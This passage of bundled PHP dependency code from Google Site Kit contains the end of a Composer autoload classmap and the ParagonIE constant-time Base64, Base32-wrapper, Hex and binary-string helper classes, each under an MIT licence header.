'/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/Classic.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Reductions\\EvalBarrett' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/EvalBarrett.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Reductions\\Montgomery' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/Montgomery.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Reductions\\MontgomeryMult' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/MontgomeryMult.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Reductions\\PowerOfTwo' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/PowerOfTwo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BinaryField' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BinaryField.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BinaryField\\Integer' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BinaryField/Integer.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\Common\\FiniteField' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/Common/FiniteField.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\Common\\FiniteField\\Integer' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/Common/FiniteField/Integer.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\PrimeField' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/PrimeField.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\PrimeField\\Integer' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/PrimeField/Integer.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Net\\SFTP' => $baseDir . '/phpseclib/phpseclib/phpseclib/Net/SFTP.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Net\\SFTP\\Stream' => $baseDir . '/phpseclib/phpseclib/phpseclib/Net/SFTP/Stream.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Net\\SSH2' => $baseDir . '/phpseclib/phpseclib/phpseclib/Net/SSH2.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\System\\SSH\\Agent' => $baseDir . '/phpseclib/phpseclib/phpseclib/System/SSH/Agent.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\System\\SSH\\Agent\\Identity' => $baseDir . '/phpseclib/phpseclib/phpseclib/System/SSH/Agent/Identity.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\System\\SSH\\Common\\Traits\\ReadBytes' => $baseDir . '/phpseclib/phpseclib/phpseclib/System/SSH/Common/Traits/ReadBytes.php', 'Normalizer' => $baseDir . '/symfony/polyfill-intl-normalizer/Resources/stubs/Normalizer.php', ); <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; use TypeError; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class RFC4648 * * This class conforms strictly to the RFC * * @package ParagonIE\ConstantTime */ abstract class RFC4648 { /** * RFC 4648 Base64 encoding * * "foo" -> "Zm9v" * * @param string $str * @return string * * @throws TypeError */ public static function base64Encode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64::encode($str); } /** * RFC 4648 Base64 decoding * * "Zm9v" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base64Decode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64::decode($str, \true); } /** * RFC 4648 Base64 (URL Safe) encoding * * "foo" -> "Zm9v" * * @param string $str * @return string * * @throws TypeError */ public static function base64UrlSafeEncode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64UrlSafe::encode($str); } /** * RFC 4648 Base64 (URL Safe) decoding * * "Zm9v" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base64UrlSafeDecode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64UrlSafe::decode($str, \true); } /** * RFC 4648 Base32 encoding * * "foo" -> "MZXW6===" * * @param string $str * @return string * * @throws TypeError */ public static function base32Encode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::encodeUpper($str); } /** * RFC 4648 Base32 encoding * * "MZXW6===" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base32Decode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::decodeUpper($str, \true); } /** * RFC 4648 Base32-Hex encoding * * "foo" -> "CPNMU===" * * @param string $str * @return string * * @throws TypeError */ public static function base32HexEncode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::encodeUpper($str); } /** * RFC 4648 Base32-Hex decoding * * "CPNMU===" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base32HexDecode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::decodeUpper($str, \true); } /** * RFC 4648 Base16 decoding * * "foo" -> "666F6F" * * @param string $str * @return string * * @throws TypeError */ public static function base16Encode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Hex::encodeUpper($str); } /** * RFC 4648 Base16 decoding * * "666F6F" -> "foo" * * @param string $str * @return string */ public static function base16Decode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Hex::decode($str, \true); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; use RangeException; use TypeError; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Hex * @package ParagonIE\ConstantTime */ abstract class Hex implements \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\EncoderInterface { /** * Convert a binary string into a hexadecimal string without cache-timing * leaks * * @param string $binString (raw binary) * @return string * @throws TypeError */ public static function encode( #[\SensitiveParameter] string $binString ) : string { $hex = ''; $len = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($binString); for ($i = 0; $i < $len; ++$i) { /** @var array<int, int> $chunk */ $chunk = \unpack('C', $binString[$i]); $c = $chunk[1] & 0xf; $b = $chunk[1] >> 4; $hex .= \pack('CC', 87 + $b + ($b - 10 >> 8 & ~38), 87 + $c + ($c - 10 >> 8 & ~38)); } return $hex; } /** * Convert a binary string into a hexadecimal string without cache-timing * leaks, returning uppercase letters (as per RFC 4648) * * @param string $binString (raw binary) * @return string * @throws TypeError */ public static function encodeUpper( #[\SensitiveParameter] string $binString ) : string { $hex = ''; $len = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($binString); for ($i = 0; $i < $len; ++$i) { /** @var array<int, int> $chunk */ $chunk = \unpack('C', $binString[$i]); $c = $chunk[1] & 0xf; $b = $chunk[1] >> 4; $hex .= \pack('CC', 55 + $b + ($b - 10 >> 8 & ~6), 55 + $c + ($c - 10 >> 8 & ~6)); } return $hex; } /** * Convert a hexadecimal string into a binary string without cache-timing * leaks * * @param string $encodedString * @param bool $strictPadding * @return string (raw binary) * @throws RangeException */ public static function decode( #[\SensitiveParameter] string $encodedString, bool $strictPadding = \false ) : string { $hex_pos = 0; $bin = ''; $c_acc = 0; $hex_len = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($encodedString); $state = 0; if (($hex_len & 1) !== 0) { if ($strictPadding) { throw new \RangeException('Expected an even number of hexadecimal characters'); } else { $encodedString = '0' . $encodedString; ++$hex_len; } } /** @var array<int, int> $chunk */ $chunk = \unpack('C*', $encodedString); while ($hex_pos < $hex_len) { ++$hex_pos; $c = $chunk[$hex_pos]; $c_num = $c ^ 48; $c_num0 = $c_num - 10 >> 8; $c_alpha = ($c & ~32) - 55; $c_alpha0 = ($c_alpha - 10 ^ $c_alpha - 16) >> 8; if (($c_num0 | $c_alpha0) === 0) { throw new \RangeException('Expected hexadecimal character'); } $c_val = $c_num0 & $c_num | $c_alpha & $c_alpha0; if ($state === 0) { $c_acc = $c_val * 16; } else { $bin .= \pack('C', $c_acc | $c_val); } $state ^= 1; } return $bin; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; use TypeError; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Binary * * Binary string operators that don't choke on * mbstring.func_overload * * @package ParagonIE\ConstantTime */ abstract class Binary { /** * Safe string length * * @ref mbstring.func_overload * * @param string $str * @return int */ public static function safeStrlen( #[\SensitiveParameter] string $str ) : int { if (\function_exists('mb_strlen')) { // mb_strlen in PHP 7.x can return false. /** @psalm-suppress RedundantCast */ return (int) \mb_strlen($str, '8bit'); } else { return \strlen($str); } } /** * Safe substring * * @ref mbstring.func_overload * * @staticvar boolean $exists * @param string $str * @param int $start * @param ?int $length * @return string * * @throws TypeError */ public static function safeSubstr( #[\SensitiveParameter] string $str, int $start = 0, $length = null ) : string { if ($length === 0) { return ''; } if (\function_exists('mb_substr')) { return \mb_substr($str, $start, $length, '8bit'); } // Unlike mb_substr(), substr() doesn't accept NULL for length if ($length !== null) { return \substr($str, $start, $length); } else { return \substr($str, $start); } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; use InvalidArgumentException; use RangeException; use TypeError; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Base64 * [A-Z][a-z][0-9]+/ * * @package ParagonIE\ConstantTime */ abstract class Base64 implements \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\EncoderInterface { /** * Encode into Base64 * * Base64 character set "[A-Z][a-z][0-9]+/" * * @param string $binString * @return string * * @throws TypeError */ public static function encode( #[\SensitiveParameter] string $binString ) : string { return static::doEncode($binString, \true); } /** * Encode into Base64, no = padding * * Base64 character set "[A-Z][a-z][0-9]+/" * * @param string $src * @return string * * @throws TypeError */ public static function encodeUnpadded( #[\SensitiveParameter] string $src ) : string { return static::doEncode($src, \false); } /** * @param string $src * @param bool $pad Include = padding? * @return string * * @throws TypeError */ protected static function doEncode( #[\SensitiveParameter] string $src, bool $pad = \true ) : string { $dest = ''; $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($src); // Main loop (no padding): for ($i = 0; $i + 3 <= $srcLen; $i += 3) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($src, $i, 3)); $b0 = $chunk[1]; $b1 = $chunk[2]; $b2 = $chunk[3]; $dest .= static::encode6Bits($b0 >> 2) . static::encode6Bits(($b0 << 4 | $b1 >> 4) & 63) . static::encode6Bits(($b1 << 2 | $b2 >> 6) & 63) . static::encode6Bits($b2 & 63); } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($src, $i, $srcLen - $i)); $b0 = $chunk[1]; if ($i + 1 < $srcLen) { $b1 = $chunk[2]; $dest .= static::encode6Bits($b0 >> 2) . static::encode6Bits(($b0 << 4 | $b1 >> 4) & 63) . static::encode6Bits($b1 << 2 & 63); if ($pad) { $dest .= '='; } } else { $dest .= static::encode6Bits($b0 >> 2) . static::encode6Bits($b0 << 4 & 63); if ($pad) { $dest .= '=='; } } } return $dest; } /** * decode from base64 into binary * * Base64 character set "./[A-Z][a-z][0-9]" * * @param string $encodedString * @param bool $strictPadding * @return string * * @throws RangeException * @throws TypeError */ public static function decode( #[\SensitiveParameter] string $encodedString, bool $strictPadding = \false ) : string { // Remove padding $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($encodedString); if ($srcLen === 0) { return ''; } if ($strictPadding) { if (($srcLen & 3) === 0) { if ($encodedString[$srcLen - 1] === '=') { $srcLen--; if ($encodedString[$srcLen - 1] === '=') { $srcLen--; } } } if (($srcLen & 3) === 1) { throw new \RangeException('Incorrect padding'); } if ($encodedString[$srcLen - 1] === '=') { throw new \RangeException('Incorrect padding'); } } else { $encodedString = \rtrim($encodedString, '='); $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($encodedString); } $err = 0; $dest = ''; // Main loop (no padding): for ($i = 0; $i + 4 <= $srcLen; $i += 4) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($encodedString, $i, 4)); $c0 = static::decode6Bits($chunk[1]); $c1 = static::decode6Bits($chunk[2]); $c2 = static::decode6Bits($chunk[3]); $c3 = static::decode6Bits($chunk[4]); $dest .= \pack('CCC', ($c0 << 2 | $c1 >> 4) & 0xff, ($c1 << 4 | $c2 >> 2) & 0xff, ($c2 << 6 | $c3) & 0xff); $err |= ($c0 | $c1 | $c2 | $c3) >> 8; } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($encodedString, $i, $srcLen - $i)); $c0 = static::decode6Bits($chunk[1]); if ($i + 2 < $srcLen) { $c1 = static::decode6Bits($chunk[2]); $c2 = static::decode6Bits($chunk[3]); $dest .= \pack('CC', ($c0 << 2 | $c1 >> 4) & 0xff, ($c1 << 4 | $c2 >> 2) & 0xff); $err |= ($c0 | $c1 | $c2) >> 8; if ($strictPadding) { $err |= $c2 << 6 & 0xff; } } elseif ($i + 1 < $srcLen) { $c1 = static::decode6Bits($chunk[2]); $dest .= \pack('C', ($c0 << 2 | $c1 >> 4) & 0xff); $err |= ($c0 | $c1) >> 8; if ($strictPadding) { $err |= $c1 << 4 & 0xff; } } elseif ($strictPadding) { $err |= 1; } } $check = $err === 0; if (!$check) { throw new \RangeException('Base64::decode() only expects characters in the correct base64 alphabet'); } return $dest; } /** * @param string $encodedString * @return string */ public static function decodeNoPadding( #[\SensitiveParameter] string $encodedString ) : string { $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($encodedString); if ($srcLen === 0) { return ''; } if (($srcLen & 3) === 0) { // If $strLen is not zero, and it is divisible by 4, then it's at least 4. if ($encodedString[$srcLen - 1] === '=' || $encodedString[$srcLen - 2] === '=') { throw new \InvalidArgumentException("decodeNoPadding() doesn't tolerate padding"); } } return static::decode($encodedString, \true); } /** * Uses bitwise operators instead of table-lookups to turn 6-bit integers * into 8-bit integers. * * Base64 character set: * [A-Z] [a-z] [0-9] + / * 0x41-0x5a, 0x61-0x7a, 0x30-0x39, 0x2b, 0x2f * * @param int $src * @return int */ protected static function decode6Bits(int $src) : int { $ret = -1; // if ($src > 0x40 && $src < 0x5b) $ret += $src - 0x41 + 1; // -64 $ret += (0x40 - $src & $src - 0x5b) >> 8 & $src - 64; // if ($src > 0x60 && $src < 0x7b) $ret += $src - 0x61 + 26 + 1; // -70 $ret += (0x60 - $src & $src - 0x7b) >> 8 & $src - 70; // if ($src > 0x2f && $src < 0x3a) $ret += $src - 0x30 + 52 + 1; // 5 $ret += (0x2f - $src & $src - 0x3a) >> 8 & $src + 5; // if ($src == 0x2b) $ret += 62 + 1; $ret += (0x2a - $src & $src - 0x2c) >> 8 & 63; // if ($src == 0x2f) ret += 63 + 1; $ret += (0x2e - $src & $src - 0x30) >> 8 & 64; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src) : string { $diff = 0x41; // if ($src > 25) $diff += 0x61 - 0x41 - 26; // 6 $diff += 25 - $src >> 8 & 6; // if ($src > 51) $diff += 0x30 - 0x61 - 26; // -75 $diff -= 51 - $src >> 8 & 75; // if ($src > 61) $diff += 0x2b - 0x30 - 10; // -15 $diff -= 61 - $src >> 8 & 15; // if ($src > 62) $diff += 0x2f - 0x2b - 1; // 3 $diff += 62 - $src >> 8 & 3; return \pack('C', $src + $diff); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Base64DotSlashOrdered * ./[0-9][A-Z][a-z] * * @package ParagonIE\ConstantTime */ abstract class Base64DotSlashOrdered extends \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64 { /** * Uses bitwise operators instead of table-lookups to turn 6-bit integers * into 8-bit integers. * * Base64 character set: * [.-9] [A-Z] [a-z] * 0x2e-0x39, 0x41-0x5a, 0x61-0x7a * * @param int $src * @return int */ protected static function decode6Bits(int $src) : int { $ret = -1; // if ($src > 0x2d && $src < 0x3a) ret += $src - 0x2e + 1; // -45 $ret += (0x2d - $src & $src - 0x3a) >> 8 & $src - 45; // if ($src > 0x40 && $src < 0x5b) ret += $src - 0x41 + 12 + 1; // -52 $ret += (0x40 - $src & $src - 0x5b) >> 8 & $src - 52; // if ($src > 0x60 && $src < 0x7b) ret += $src - 0x61 + 38 + 1; // -58 $ret += (0x60 - $src & $src - 0x7b) >> 8 & $src - 58; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src) : string { $src += 0x2e; // if ($src > 0x39) $src += 0x41 - 0x3a; // 7 $src += 0x39 - $src >> 8 & 7; // if ($src > 0x5a) $src += 0x61 - 0x5b; // 6 $src += 0x5a - $src >> 8 & 6; return \pack('C', $src); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Base64DotSlash * ./[A-Z][a-z][0-9] * * @package ParagonIE\ConstantTime */ abstract class Base64DotSlash extends \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64 { /** * Uses bitwise operators instead of table-lookups to turn 6-bit integers * into 8-bit integers. * * Base64 character set: * ./ [A-Z] [a-z] [0-9] * 0x2e-0x2f, 0x41-0x5a, 0x61-0x7a, 0x30-0x39 * * @param int $src * @return int */ protected static function decode6Bits(int $src) : int { $ret = -1; // if ($src > 0x2d && $src < 0x30) ret += $src - 0x2e + 1; // -45 $ret += (0x2d - $src & $src - 0x30) >> 8 & $src - 45; // if ($src > 0x40 && $src < 0x5b) ret += $src - 0x41 + 2 + 1; // -62 $ret += (0x40 - $src & $src - 0x5b) >> 8 & $src - 62; // if ($src > 0x60 && $src < 0x7b) ret += $src - 0x61 + 28 + 1; // -68 $ret += (0x60 - $src & $src - 0x7b) >> 8 & $src - 68; // if ($src > 0x2f && $src < 0x3a) ret += $src - 0x30 + 54 + 1; // 7 $ret += (0x2f - $src & $src - 0x3a) >> 8 & $src + 7; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src) : string { $src += 0x2e; // if ($src > 0x2f) $src += 0x41 - 0x30; // 17 $src += 0x2f - $src >> 8 & 17; // if ($src > 0x5a) $src += 0x61 - 0x5b; // 6 $src += 0x5a - $src >> 8 & 6; // if ($src > 0x7a) $src += 0x30 - 0x7b; // -75 $src -= 0x7a - $src >> 8 & 75; return \pack('C', $src); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Base64UrlSafe * [A-Z][a-z][0-9]\-_ * * @package ParagonIE\ConstantTime */ abstract class Base64UrlSafe extends \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64 { /** * Uses bitwise operators instead of table-lookups to turn 6-bit integers * into 8-bit integers. * * Base64 character set: * [A-Z] [a-z] [0-9] - _ * 0x41-0x5a, 0x61-0x7a, 0x30-0x39, 0x2d, 0x5f * * @param int $src * @return int */ protected static function decode6Bits(int $src) : int { $ret = -1; // if ($src > 0x40 && $src < 0x5b) $ret += $src - 0x41 + 1; // -64 $ret += (0x40 - $src & $src - 0x5b) >> 8 & $src - 64; // if ($src > 0x60 && $src < 0x7b) $ret += $src - 0x61 + 26 + 1; // -70 $ret += (0x60 - $src & $src - 0x7b) >> 8 & $src - 70; // if ($src > 0x2f && $src < 0x3a) $ret += $src - 0x30 + 52 + 1; // 5 $ret += (0x2f - $src & $src - 0x3a) >> 8 & $src + 5; // if ($src == 0x2c) $ret += 62 + 1; $ret += (0x2c - $src & $src - 0x2e) >> 8 & 63; // if ($src == 0x5f) ret += 63 + 1; $ret += (0x5e - $src & $src - 0x60) >> 8 & 64; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src) : string { $diff = 0x41; // if ($src > 25) $diff += 0x61 - 0x41 - 26; // 6 $diff += 25 - $src >> 8 & 6; // if ($src > 51) $diff += 0x30 - 0x61 - 26; // -75 $diff -= 51 - $src >> 8 & 75; // if ($src > 61) $diff += 0x2d - 0x30 - 10; // -13 $diff -= 61 - $src >> 8 & 13; // if ($src > 62) $diff += 0x5f - 0x2b - 1; // 3 $diff += 62 - $src >> 8 & 49; return \pack('C', $src + $diff); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; use InvalidArgumentException; use RangeException; use TypeError; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial 